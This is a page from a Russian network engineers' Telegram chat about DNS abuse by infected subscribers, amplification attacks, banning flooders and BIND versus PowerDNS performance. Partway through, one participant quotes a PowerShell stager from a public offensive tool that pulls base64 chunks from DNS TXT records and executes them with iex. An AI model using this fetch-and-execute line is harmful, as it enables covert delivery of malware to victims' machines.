@linkmeup_chat

Страница 380 из 1252
Vladislav
08.09.2017
12:13:57
кого-то снаружи через бордер :D

Dmitry
08.09.2017
12:14:00
кого ддосит?
к примеру провайдера

Google
Anton
08.09.2017
12:14:10
к примеру провайдера
всмысле все разом шлюз пингуют?

kino
08.09.2017
12:14:48
ви таки не поверите: вирусня ддосит адски. я вон днс долго пилил чтоб он не падал.
хсм тоесть если много запросо к днс провайдера,то бан,оригинально

Dmitry
08.09.2017
12:14:58
всмысле все разом шлюз пингуют?
в смысле если днс - то вирус на компе пользователя пытается то dna amplification attack устроить то еще чего

Dmitry
08.09.2017
12:15:42
на шлюз?
http://whatis.techtarget.com/definition/DNS-amplification-attack

Anton
08.09.2017
12:15:55
да я знаю что такое амплификейшон

атака на кого?

Dmitry
08.09.2017
12:16:14
да хоть на кого. на ник ру недавно была

это ботсеть

сидишь такой и видишь как сабскрайбер 6000 запросов херачит

1... 2... 20... ой - днс тупит.. ой заббикс завизжал.. о! Бан сработал - полегчало...

Anton
08.09.2017
12:18:54
чёт тут намешено куча всего, куча сессий, амплификейшон, бот сеть

Google
Dmitry
08.09.2017
12:19:16
это спросили просто кого от чего защищают

Anton
08.09.2017
12:19:27
уязвимый днс, например те что на роутерах стоят не обязательно должны быть частью бот сетей

а если они часть, то там не обязательно днс-амплификейшон, там что угодно можно, хоть син-флуд, хоть тупо канал забивать одной сессией

Dmitry
08.09.2017
12:20:42
Anton
08.09.2017
12:21:41
кто нить понял, что там за скрипт, который повершел через днс запросы выполняет?

какая-то бредятина

Dmitry
08.09.2017
12:22:05
подробнее?

Anton
08.09.2017
12:22:14
зачем выполнять повершел на компе, на котором уже питон есть

ну последняя новость на линкмиап канале

Dmitry
08.09.2017
12:22:35
а - ща схожу

Anton
08.09.2017
12:25:00
Пятница на дворе и хочется чего-то такого этакого. И в качестве этакого сегодня выступает старая шутка про перебор двигателя через выхлопную трубу. А именно: как с помощью питона пропихнуть powershell скрипт используя DNS туннель. Некоторые судари явно знают толк… Главный признак гениальности – простота, наличествует, ибо скрипт дуболомен до прекрасного. Нарезаем скрипт на кусочки по 250 символов, распихиваем в TXT записи, целевая машина начинает запрашивать TXT записи и вуаля! Всем разобраться как работает и доложить Наташе. Там сотни строчек нет, а Наташа будет рада за взрощённых питонщиков. https://github.com/mdsecactivebreach/PowerDNS

их обычно тут удаляют

Dmitry
08.09.2017
12:25:10
https://t.me/linkmeup_podcast

ну поглядел... ничего нового....

я помню как any от клиентов закрывал

kino
08.09.2017
12:26:37
ну на винде нет питону из коробке

Dmitry
08.09.2017
12:27:50
на софт-fw бывает

ну я скрипт не смотрел

Google
One
08.09.2017
12:36:55
хсм тоесть если много запросо к днс провайдера,то бан,оригинально
нормально, таких ддосеров не так и много, вполне себе отделяются организации, где много запросов от флудеров

Dmitry
08.09.2017
12:38:01
у нас это было настолько бедой - что юзерам выдавали гугловские днсы

kino
08.09.2017
12:38:18
зачем выполнять повершел на компе, на котором уже питон есть
этот скрипт серверный а на жертву загрузчик попадает другим способом,этот скрипт просто режет полезную нагрузку и загружает dns txt

Anton
08.09.2017
12:38:49
ну я и говорю

зачем нужен павершел?

можно же так же на питоне выполнять

One
08.09.2017
12:39:50
вообще, настраивалось так - fail2ban как индикатор, отсекалось на BRAS'е аклом, оповещался колл центр, он звонил абоненту и отправлял письмо о проблеме

Anton
08.09.2017
12:39:58
ещё и скапи залупили

он же будет вместе с отновным dns replay ещё и icmp unreacheble отправлять

че для питона нету днс сервера нормального?

ну или просто сокет голый

kino
08.09.2017
12:41:03
ну я и говорю
ты скрипт читал? скрипт выполняеться на машине атакующего чтобы загрузить повешелл скрипт для жертвы,которая его потом скачает

Dmitry
08.09.2017
12:41:07
ну я таких в дроп молча. превысил - начались дропы. если совсем дропы - у абона нихера не робит - он звонит и пищит.

только пока не приделано оповещение КЦ. там в црм надо писать. а я не программист

kino
08.09.2017
12:42:03
One
08.09.2017
12:42:15
ну я таких в дроп молча. превысил - начались дропы. если совсем дропы - у абона нихера не робит - он звонит и пищит.
а тут ему звонят - "Уймись, упырь, напишем в органы соответствующие за вредительство сетевое"

Dmitry
08.09.2017
12:43:07
а тут ему звонят - "Уймись, упырь, напишем в органы соответствующие за вредительство сетевое"
да как же... звонили. он нахер посылает: типа у меня пашет и неепет. а щас проще)

да и некогда нам звонить... много их.. а как выйдет какое говно....

kino
08.09.2017
12:43:44
а как скачает то?
вот так "for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.%s')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))" % (str(len(chunks)), domain)

Google
One
08.09.2017
12:44:09
да как же... звонили. он нахер посылает: типа у меня пашет и неепет. а щас проще)
отсечку то от днс он получает полную, вообще никуда стукнуть не может

10 минут

Dmitry
08.09.2017
12:44:31
kino
08.09.2017
12:45:24
ну и как эту строчку запустить у жертвы?
ну тут куча вариантов от эксплоит китов до макросов в ворде

One
08.09.2017
12:45:32
тут года полтора назад вконтактик амплифаерили, вот пришлось сделать

Admin
ERROR: S client not available

Dmitry
08.09.2017
12:46:20
я помню как бинды валились.. потом восьмерки поставил товарищ-админ. народ ныл - все тупит. там 40мс отклик.. потом он уволился и меня допустили до сети) и я поверднс-рекурсор курить начал.

kino
08.09.2017
12:46:38
One
08.09.2017
12:47:01
бинды норм тащат, что их менять?

на старых машинках еще и лучше чем повер

Dmitry
08.09.2017
12:47:47
бинды норм тащат, что их менять?
год назад при 50К сабскрайберов этот биндовый сервер падал.... быстро

One
08.09.2017
12:48:11
может донастроить нужно было

ну тут чужое хозяйство, каждый сам себе молоток по руке выбирает

Dmitry
08.09.2017
12:49:10
может донастроить нужно было
да там как не строй... точнее не падал: тупил. Адски! а рекурсор работает - оччень редко когда на 5 минут притупит до 40МС и все

на авторитарниках - отлично пашут!

может и бинды конечно.. я попробую - но шеф меня отговаривал от такого занятия

One
08.09.2017
12:51:53
на стенде поиграйся просто, нет там существенной разницы в скорости

повер мне не понравлся тем, что при пиковой нагрузке тупо встает и все

а бинд меееееедлееееенноооо отвечает

Google
Dmitry
08.09.2017
12:53:22


у меня повер ни разу не вставал

вот бинд и отвечал

мееедленно

andrew
08.09.2017
16:17:11
Может пора делать кластер из биндов :) Мне советовали Gentoo+Bind для быстрых откликов. На сайте рейтинга с тестами, связка Gentoo+Bind была на 1 месте.





https://indico.dns-oarc.net/event/8/contribution/5/material/slides/0.ppt

Anton
08.09.2017
18:21:01
Эммм... а год-то тестов какой? Может всё уже давно поменялось...

Innokentiy
08.09.2017
18:28:55
да ну, разве что-то могло с 2007 года в IT поменяться? чушь

andrew
09.09.2017
07:23:57
Эммм... а год-то тестов какой? Может всё уже давно поменялось...
Я узнал о рейтингах от Михаила Варакина в 2011г на кусах Специалист при МГТУ им. Баумана. Может у него есть данные свежее. М. Варакин сейчас курс ведет интересный с: Ansible, Zabbix, Git и контейнерами Linux http://miaton.ru/course/linux-dlya-windows-administratora-uroven-2 В компании держали сайт на Gentoo (nginx+MySQL+чат, + .., + .., +.., + ..), но сайт - это много компонент, а вот Bind проще как-то звучит. И кстати забили на Gentoo и переделали всё на Debian. Gentoo - компиляй, компиляй, компиляй.



Эммм... а год-то тестов какой? Может всё уже давно поменялось...
Можно ещё самим рассчитать производительность сервера с Bind(-ом), если данные о сервере взять с cайта http://www.spec.org/benchmarks.html#cpu Скажем, подобрать сервер.

bormoglotx
09.09.2017
10:41:20
Коллеги, у кого есть датацентры с evpn/vxlan???

Интересует что используете для overlay/underlay: ebgp/ebgp, ebgp/ibgp, igp/ibgp...

Ruslan
09.09.2017
10:54:05
а у тебя какие свичи и облако?

bormoglotx
09.09.2017
10:55:04
Свичи

Страница 380 из 1252